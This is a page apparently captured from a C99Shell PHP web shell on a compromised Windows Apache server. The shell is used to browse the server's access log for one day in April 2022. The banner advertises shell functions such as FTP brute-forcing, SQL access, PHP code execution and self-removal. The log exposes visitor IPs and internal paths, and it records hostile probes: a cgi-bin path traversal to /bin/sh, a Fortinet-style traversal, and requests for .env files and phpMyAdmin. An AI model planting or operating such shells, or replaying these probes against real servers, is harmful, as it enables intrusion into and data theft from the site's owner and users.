!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 8.02 GB of 239.26 GB (3.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2022.04.05.log (2.49 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
191.156.158.192 - - [05/Apr/2022:00:00:10 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
191.156.158.192 - - [05/Apr/2022:00:00:21 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2022&resuelve=semana%20santa HTTP/1.1" 200 626
191.156.158.192 - - [05/Apr/2022:00:00:27 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2022&resuelve=vacaciones HTTP/1.1" 200 626
191.156.158.192 - - [05/Apr/2022:00:00:38 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2022&resuelve=descanso HTTP/1.1" 200 626
191.156.158.192 - - [05/Apr/2022:00:00:40 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
191.156.158.192 - - [05/Apr/2022:00:00:40 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
191.156.152.27 - - [05/Apr/2022:00:00:40 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
191.156.158.192 - - [05/Apr/2022:00:00:40 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
191.156.152.27 - - [05/Apr/2022:00:00:43 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
191.156.158.192 - - [05/Apr/2022:00:00:44 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
191.156.158.192 - - [05/Apr/2022:00:00:43 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 308154
191.156.158.192 - - [05/Apr/2022:00:00:46 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2022%2F HTTP/1.1" 200 8333
191.156.158.192 - - [05/Apr/2022:00:00:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0613.pdf HTTP/1.1" 200 355730
191.156.158.192 - - [05/Apr/2022:00:01:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0611.pdf HTTP/1.1" 200 348228
191.156.158.192 - - [05/Apr/2022:00:01:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0572.pdf HTTP/1.1" 200 349504
191.156.158.192 - - [05/Apr/2022:00:01:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0465.pdf HTTP/1.1" 200 367918
191.156.158.192 - - [05/Apr/2022:00:01:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0369.pdf HTTP/1.1" 200 331982
191.156.158.192 - - [05/Apr/2022:00:01:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0368.pdf HTTP/1.1" 200 329915
172.22.2.4 - - [05/Apr/2022:00:00:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
191.156.158.192 - - [05/Apr/2022:00:01:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0365.pdf HTTP/1.1" 200 340936
191.156.152.27 - - [05/Apr/2022:00:01:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0337.pdf HTTP/1.1" 200 3339067
216.245.221.92 - - [05/Apr/2022:00:01:54 -0500] "HEAD / HTTP/1.1" 200 -
191.156.152.27 - - [05/Apr/2022:00:02:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0313.pdf HTTP/1.1" 200 392814
191.156.152.27 - - [05/Apr/2022:00:02:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0312.pdf HTTP/1.1" 200 6486913
191.156.151.64 - - [05/Apr/2022:00:02:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0214.pdf HTTP/1.1" 200 373747
172.22.2.4 - - [05/Apr/2022:00:00:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59688
191.156.158.75 - - [05/Apr/2022:00:02:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0174.pdf HTTP/1.1" 200 364802
191.156.158.75 - - [05/Apr/2022:00:03:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0170.pdf HTTP/1.1" 200 588176
191.156.156.129 - - [05/Apr/2022:00:03:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0168.pdf HTTP/1.1" 200 5137411
191.156.156.129 - - [05/Apr/2022:00:03:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0150.pdf HTTP/1.1" 200 367673
191.156.156.129 - - [05/Apr/2022:00:03:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0149.pdf HTTP/1.1" 200 315749
191.156.156.129 - - [05/Apr/2022:00:04:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0145.pdf HTTP/1.1" 200 440988
191.156.156.129 - - [05/Apr/2022:00:04:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0143.pdf HTTP/1.1" 200 395813
191.156.156.129 - - [05/Apr/2022:00:04:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0140.pdf HTTP/1.1" 200 439712
207.46.13.179 - - [05/Apr/2022:00:04:37 -0500] "GET /BLA/resoluciones/AUTOS%202018/3945.pdf HTTP/1.1" 304 -
172.22.2.4 - - [05/Apr/2022:00:03:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63729
191.156.151.64 - - [05/Apr/2022:00:04:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0030.pdf HTTP/1.1" 200 394408
191.156.151.64 - - [05/Apr/2022:00:05:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0044.pdf HTTP/1.1" 200 359031
191.156.151.64 - - [05/Apr/2022:00:05:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0096.pdf HTTP/1.1" 200 396374
191.156.154.210 - - [05/Apr/2022:00:05:34 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2022&resuelve=compen HTTP/1.1" 200 626
191.156.159.16 - - [05/Apr/2022:00:06:03 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2021&resuelve=vacaciones HTTP/1.1" 200 626
216.245.221.92 - - [05/Apr/2022:00:06:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:00:05:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:00:06:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52945
66.249.65.13 - - [05/Apr/2022:00:09:33 -0500] "-" 408 -
172.22.2.4 - - [05/Apr/2022:00:09:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.245.221.92 - - [05/Apr/2022:00:11:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:00:12:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [05/Apr/2022:00:11:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.157 - - [05/Apr/2022:00:13:38 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 342490
172.22.2.4 - - [05/Apr/2022:00:12:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52945
152.61.128.50 - - [05/Apr/2022:00:14:41 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [05/Apr/2022:00:16:54 -0500] "HEAD / HTTP/1.1" 200 -
191.108.7.71 - - [05/Apr/2022:00:17:27 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+UjdVYp2sOxOPUOjg/QPs0xt/F+fHpg2SS/G2SswhcUm7emJkbJyLmzSKSkxhvz/sIJyq6p/YCv+heG5zn+NUB0YO+iQEtfDPSNZMHEya1vJF5l8qnmxGqfWC5Sa1p5uq9H1iZ09TwPZh5yXZqqetBP3hG28OEWihu6xac98O1DkvGssGcSKEd8vTP+cyqL/J/HTdXLqYTFAt+3ThcKzIeO7r5ZmE0eteDKLZVXXXKjXCaQtubTEvRAMlQjfn7mXucjsG6u9NPnw==&u=U2FsdGVkX1/cx9SWYQKBeDIGbKzutMuacKjCdrQ6bDr2mmN9OfJGkgHlAm3gzith&y=U2FsdGVkX1/Gf36aljphpSE4Xijd/2LOqaoc1TOXV+WLQb3aQ6H1P8CEON+yCKKF HTTP/1.1" 200 25
191.108.7.71 - - [05/Apr/2022:00:17:28 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/HRC6NNuHUbCPYfHT1BkwwfsJ3vXxogFR/Bmo3bAr3/wbm+/RfiA6NYP3KABRQD0Qs/nWD0gMCDwNpb8bImpNU2QoqlZozfSyWHXxQ1o0bMT5sL8/818LPX+TvFASJjbeCrj04LAEl87rp0mPVNxbMMoVwvCjvF5djqbblWRCibSiYcxuzjZGAPVKZLnimvV3kclnl5og5FPqjOOoOJxNjxI1AZhTI0CNLYfs1pbErY6JMqcBii6FohYbA/857TxPhhsiFp4WnMJ/M8bTQ6sAC5tTJzzltMDqyYaucFm/jv9L8JvLdMuTz3HGxMjTuBkanI/JfGzjp0lNH0H/H9m0g6eD7Luy5KAHq6zz8+NNasvGAJ6e8gOUaIoW813P8SGQXbEkQGzjB7f3rXMqVacxt2rSXTusxbrSm2lt5oSVZ+vRug9/PhD1VSqXjvQPfeaTcTxWryWC9Ly83Yx7ZoMnFvEPnumSKXw1FGFdrLQY2+fsFzZklmWAmJIKWntEmDR+yutJcmRa2JlEWVYGYfhDay/Cnp5lyRRFoZcDyHqIBQAlhaIYkmir+km49VCwRvcFxGtKIZKFYr/rToYdHIQIA5Ey28+JCWQF8NWnfYEpZIy6d3eABAy/v6x0PH517q1iUn9fojQClyKqpfp8Oktbo/OMmrtvJJGweD0Dqa+vIzpU6XX2kIYQ1reqoKg3f2eje4s26QpUIXFK7xk4WRvu2XRLMElJBGMgkAM3jGCPZGcQlGs8aReqvWWZ+3qY77SP0WfVP0mZ0Y4Bt+Xn6sPWdTSPc4u1MNQ3Vp1yG014VoP+z9kSv+liqVvmEn/XfA1O3/bC8axUDIOjK8ZpfjzM3Nnkg7XV0Yh7Oq6sWvkz+0+Hioi9ZJuPDg7GOsI+yfLVwd7Dxa1ISvHd+ADT0GQjyShK1sp9le9jfkQHiqJyCHr2dkZpImiIWWRbYv80p4PUW/Vn9xM0HhwavCzB4dSKKXZEdSz84HgS3RCdg/+GN8nFnzI709U/foaKXybfuxjwfIXM+qXg+OhLgcRRz1zr90wQFq9ZLWExoug/xJ2/xaZ3DF6Rgq82g/N8sWcKosE/dFnqZSKpVN1nKM6uA8xEXJWhjbH44kLhPcP7s8qoe5/gCGy7hzQb3xoOCYCqdLhFGb5a1p9F/gZUrE3D/bHtyVE+t6EFnwHscPIg1WcXm+Po/Y1o9IvfC6hpUJF+Lj+KCTLoiDxjovPyL1igGNBxjRmbNWkrx/vp9BUIbA4NY6kgqyUo6BFnmU6k4adcIeTx5S4dUGToAnWG6krTKX0gd9aZKAuu1UpcgaiqMfraeHnZ/NBraIMwJ/8acbkcXwXcBl6/3+ePsoHZSZPqzNbds10UN0Q7OjtDK6RepEIUcrrZTOrm5EXCjFVd/MSmotwGEz1cOXCLvn3Fl/hEA/+6irKJbbnReqaRU+76C5GgQz8Yaqah0olNbkY0+GDPJGoKjRYj7xCsr5ZfujlCT7eZ8d2F50DlbPzF+LpZ34R7MNsu4sxi+etBYkvYb7CqsNok5y6CVoU9s4AC+Uiu//NPccYi/3PkO7V9CunFSXsa3WQulri2NFgaprAIbLR5Qmb6JOfOW9YlLY1E88U1JGDP0NpX7OZCv3gwDPKVn9x3hCD7NUJGnzqUFcrxMW54VOVq62ufvVBAczA==&u=U2FsdGVkX1/cx9SWYQKBeDIGbKzutMuacKjCdrQ6bDr2mmN9OfJGkgHlAm3gzith&y=U2FsdGVkX1/Gf36aljphpSE4Xijd/2LOqaoc1TOXV+WLQb3aQ6H1P8CEON+yCKKF HTTP/1.1" 200 25
191.108.7.71 - - [05/Apr/2022:00:17:28 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+mUjGZEirSKkG0rFblj6UJDN2OjnKeySbXOYZ744FXQEixE0tQswUbkphxkj910RTMUnAZZ26V0t0Sh7IJA7+L8c8F5tTw6DtSVAIFC5KJPPzvSW3izLkXcBQR0o8glPdAOa89juPI3ff7uEZ8uSWfwTAL88OQFrI=&u=U2FsdGVkX1/cx9SWYQKBeDIGbKzutMuacKjCdrQ6bDr2mmN9OfJGkgHlAm3gzith&y=U2FsdGVkX1/Gf36aljphpSE4Xijd/2LOqaoc1TOXV+WLQb3aQ6H1P8CEON+yCKKF HTTP/1.1" 200 25
191.108.7.71 - - [05/Apr/2022:00:17:28 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+co9g175FCorl1oDF7+nusoCBKV8OmyAHcmv+1SWuWayLcLqRfQw+23OK10FKxHhyX6QhVWcD5QxNRG5COkFI4QqWqJw2WbmEyfZ53aXhujGKDb5ElWbKkow2lX7trCyr2CZ9YKvlsMsIrk0Zfh2qOcG1BdMQrWCY=&u=U2FsdGVkX1/cx9SWYQKBeDIGbKzutMuacKjCdrQ6bDr2mmN9OfJGkgHlAm3gzith&y=U2FsdGVkX1/Gf36aljphpSE4Xijd/2LOqaoc1TOXV+WLQb3aQ6H1P8CEON+yCKKF HTTP/1.1" 200 25
191.108.7.71 - - [05/Apr/2022:00:17:28 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+h8Iv1rIvNU0BhSMWVO2V/vLNDcHropKgokhUFW2wXS4iokCghKgPeE6r+4ZFD4N/+AhnZDn7lTkxnfX24iXT7v7ajEbVSDbNoQ5UyXz2rTCJkKQg9SSMMZ1p6AL8oJ0bfn8+utvTZXynbv5OeQBBhxuUT7ZMf+Fc=&u=U2FsdGVkX1/cx9SWYQKBeDIGbKzutMuacKjCdrQ6bDr2mmN9OfJGkgHlAm3gzith&y=U2FsdGVkX1/Gf36aljphpSE4Xijd/2LOqaoc1TOXV+WLQb3aQ6H1P8CEON+yCKKF HTTP/1.1" 200 25
191.108.7.71 - - [05/Apr/2022:00:17:28 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19JdrtYTN9J8pydAdBUN9BoMuEya0G5O/J+y2XyPMBFr0MdgVj/fQAqRQuF98Vp25EYcqpaV+QR3Pmcx7JZb1XzBNhCzAUQ4ZlpVOQsCXshE4o8ir2nlS/70BxKCAaJ70PbgungThnwuJa8DF7UAstOI3lcR0bhhLhBUeRwOQ0/Azg5rkes8u+SOT8aCMVh2+GcjvDX07izXA==&u=U2FsdGVkX1/cx9SWYQKBeDIGbKzutMuacKjCdrQ6bDr2mmN9OfJGkgHlAm3gzith&y=U2FsdGVkX1/Gf36aljphpSE4Xijd/2LOqaoc1TOXV+WLQb3aQ6H1P8CEON+yCKKF HTTP/1.1" 200 25
190.158.204.160 - - [05/Apr/2022:00:17:47 -0500] "GET /si-eres-mujer-y-te-gusta-el-cuidado-de-los-humedales-este-proceso-de-formacion-es-para-ti.html HTTP/1.1" 200 1025
207.46.13.199 - - [05/Apr/2022:00:18:30 -0500] "GET /Publicaciones/2022EE01390.pdf HTTP/1.1" 404 227
172.22.2.4 - - [05/Apr/2022:00:17:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:00:18:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56669
152.61.192.232 - - [05/Apr/2022:00:21:30 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [05/Apr/2022:00:21:54 -0500] "HEAD / HTTP/1.1" 200 -
89.248.165.52 - - [05/Apr/2022:00:22:06 -0500] "CONNECT hotmail-com.olc.protection.outlook.com:25 HTTP/1.1" 405 966
201.245.192.253 - - [05/Apr/2022:00:22:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42878
66.249.65.13 - - [05/Apr/2022:00:23:15 -0500] "-" 408 -
201.245.192.253 - - [05/Apr/2022:00:23:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45614
172.22.2.4 - - [05/Apr/2022:00:23:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:00:24:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59688
207.46.13.157 - - [05/Apr/2022:00:25:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1220.pdf HTTP/1.1" 200 406941
216.245.221.92 - - [05/Apr/2022:00:26:54 -0500] "HEAD / HTTP/1.1" 200 -
192.109.145.231 - - [05/Apr/2022:00:27:14 -0500] "GET /galeria/nivo-slider/demo/images/avances-sentencias-rio-bogota-2.jpg HTTP/1.1" 304 -
172.22.2.4 - - [05/Apr/2022:00:29:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:00:30:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55877
216.245.221.92 - - [05/Apr/2022:00:31:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [05/Apr/2022:00:32:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42878
201.245.192.253 - - [05/Apr/2022:00:33:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45614
66.249.73.157 - - [05/Apr/2022:00:34:14 -0500] "-" 408 -
172.22.2.4 - - [05/Apr/2022:00:35:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Apr/2022:00:36:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:00:35:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53344
40.77.167.78 - - [05/Apr/2022:00:39:52 -0500] "GET / HTTP/1.1" 200 4720
66.249.65.17 - - [05/Apr/2022:00:41:22 -0500] "-" 408 -
216.245.221.92 - - [05/Apr/2022:00:41:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:00:40:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
45.155.204.146 - - [05/Apr/2022:00:42:36 -0500] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 945
201.245.192.253 - - [05/Apr/2022:00:42:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42878
172.22.2.4 - - [05/Apr/2022:00:41:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56300
192.241.225.136 - - [05/Apr/2022:00:43:33 -0500] "MGLNDD_190.27.245.106_80" 501 953
201.245.192.253 - - [05/Apr/2022:00:43:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45614
172.22.2.4 - - [05/Apr/2022:00:45:05 -0500] "GET /BLA/boletinlegal/remote/fgt_lang?lang=/../../../..//////////dev/ HTTP/1.1" 404 1018
181.237.191.120 - - [05/Apr/2022:00:45:33 -0500] "GET /forest/login.do HTTP/1.1" 404 1120
216.245.221.92 - - [05/Apr/2022:00:46:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:00:46:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:00:47:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53344
66.249.65.13 - - [05/Apr/2022:00:50:33 -0500] "-" 408 -
172.22.2.4 - - [05/Apr/2022:00:51:18 -0500] "GET /BLA/boletinlegal/admin/config.php HTTP/1.1" 200 -
216.245.221.92 - - [05/Apr/2022:00:51:54 -0500] "HEAD / HTTP/1.1" 200 -
186.30.145.166 - - [05/Apr/2022:00:52:06 -0500] "GET /si-eres-mujer-y-te-gusta-el-cuidado-de-los-humedales-este-proceso-de-formacion-es-para-ti.html?fbclid=IwAR38LUS6gAdm1mwZe1rquXYBaSQi1G0434ODTzK9FtgF0Mb6au92VR0qWwQ HTTP/1.1" 200 1025
179.1.128.234 - - [05/Apr/2022:00:52:42 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
179.1.128.234 - - [05/Apr/2022:00:52:47 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
179.1.128.234 - - [05/Apr/2022:00:52:50 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
172.22.2.4 - - [05/Apr/2022:00:52:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:00:53:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
40.77.167.46 - - [05/Apr/2022:00:55:36 -0500] "GET /BLA/resoluciones/AUTOS%202018/1025.pdf HTTP/1.1" 304 -
216.245.221.92 - - [05/Apr/2022:00:56:54 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.157 - - [05/Apr/2022:00:57:58 -0500] "-" 408 -
40.77.167.46 - - [05/Apr/2022:00:58:46 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
178.73.215.171 - - [05/Apr/2022:00:58:53 -0500] "GET / HTTP/1.0" 200 319
152.61.128.50 - - [05/Apr/2022:00:59:18 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [05/Apr/2022:00:59:19 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [05/Apr/2022:00:59:20 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
172.22.2.4 - - [05/Apr/2022:00:58:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:00:59:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
186.80.100.236 - - [05/Apr/2022:01:01:26 -0500] "GET /si-eres-mujer-y-te-gusta-el-cuidado-de-los-humedales-este-proceso-de-formacion-es-para-ti.html?fbclid=IwAR1hhEcFPxbCxEsuTBK0xATDCKEsrYaANzCzETdmGNS-mtiA31E9g1vf8kY HTTP/1.1" 200 1025
201.221.172.51 - - [05/Apr/2022:01:01:40 -0500] "GET /si-eres-mujer-y-te-gusta-el-cuidado-de-los-humedales-este-proceso-de-formacion-es-para-ti.html?fbclid=IwAR2XaoK3m9SCIDW_l8CbAsyZsR71LgwQ3W57fJI8gxXPcSBIHeZouc3wTq0 HTTP/1.1" 200 1025
216.245.221.92 - - [05/Apr/2022:01:01:54 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.157 - - [05/Apr/2022:01:02:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1220.pdf HTTP/1.1" 200 406941
66.249.65.13 - - [05/Apr/2022:01:03:02 -0500] "-" 408 -
178.128.216.55 - - [05/Apr/2022:01:03:25 -0500] "GET /phpmyadmin/index.php HTTP/1.1" 403 1165
178.128.216.55 - - [05/Apr/2022:01:03:25 -0500] "GET /phpmyadmin/index.php HTTP/1.1" 403 1211
45.155.204.146 - - [05/Apr/2022:01:04:00 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [05/Apr/2022:01:04:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:01:05:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
152.61.192.232 - - [05/Apr/2022:01:06:43 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [05/Apr/2022:01:06:44 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [05/Apr/2022:01:06:44 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
173.252.95.116 - - [05/Apr/2022:01:06:53 -0500] "GET /secretaria-de-ambiente-abre-las-votaciones-para-definir-las-mejores-practicas-ambientales-en-las-entidades-publicas.html HTTP/1.1" 206 996
173.252.95.21 - - [05/Apr/2022:01:06:53 -0500] "GET /secretaria-de-ambiente-abre-las-votaciones-para-definir-las-mejores-practicas-ambientales-en-las-entidades-publicas.html HTTP/1.1" 206 996
216.245.221.92 - - [05/Apr/2022:01:06:54 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.21 - - [05/Apr/2022:01:06:55 -0500] "GET /images/buenas-practicas-ambientales21-octubre.jpg HTTP/1.1" 200 77514
157.55.39.23 - - [05/Apr/2022:01:07:22 -0500] "-" 408 -
173.252.95.120 - - [05/Apr/2022:01:08:17 -0500] "GET /tres-entidades-distritales-ganadoras-del-concurso-al-trabajo-en-bici.html HTTP/1.1" 206 945
66.249.65.13 - - [05/Apr/2022:01:10:25 -0500] "-" 408 -
172.22.2.4 - - [05/Apr/2022:01:10:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [05/Apr/2022:01:11:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:01:11:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [05/Apr/2022:01:10:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57044
216.245.221.92 - - [05/Apr/2022:01:16:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:01:15:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:01:16:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51365
40.77.167.46 - - [05/Apr/2022:01:17:57 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 61416
66.249.65.13 - - [05/Apr/2022:01:21:43 -0500] "-" 408 -
216.245.221.92 - - [05/Apr/2022:01:21:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:01:21:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [05/Apr/2022:01:22:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42737
172.22.2.4 - - [05/Apr/2022:01:21:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [05/Apr/2022:01:23:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45612
172.22.2.4 - - [05/Apr/2022:01:22:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
45.137.22.113 - - [05/Apr/2022:01:24:19 -0500] "GET /.env HTTP/1.1" 404 1049
45.137.22.113 - - [05/Apr/2022:01:24:19 -0500] "GET /.env HTTP/1.1" 404 1022
45.137.22.113 - - [05/Apr/2022:01:24:19 -0500] "GET /.env HTTP/1.1" 404 1043
45.137.22.113 - - [05/Apr/2022:01:24:19 -0500] "POST / HTTP/1.1" 200 319
45.137.22.113 - - [05/Apr/2022:01:24:19 -0500] "POST / HTTP/1.1" 200 319
45.137.22.113 - - [05/Apr/2022:01:24:19 -0500] "POST / HTTP/1.1" 200 319
172.22.2.4 - - [05/Apr/2022:01:24:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
216.245.221.92 - - [05/Apr/2022:01:26:54 -0500] "HEAD / HTTP/1.1" 200 -
159.89.24.92 - - [05/Apr/2022:01:28:04 -0500] "GET / HTTP/1.0" 200 319
66.249.65.13 - - [05/Apr/2022:01:28:28 -0500] "-" 408 -
172.22.2.4 - - [05/Apr/2022:01:27:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [05/Apr/2022:01:28:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
216.245.221.92 - - [05/Apr/2022:01:31:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [05/Apr/2022:01:32:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42737
201.245.192.253 - - [05/Apr/2022:01:33:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45612
172.22.2.4 - - [05/Apr/2022:01:33:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
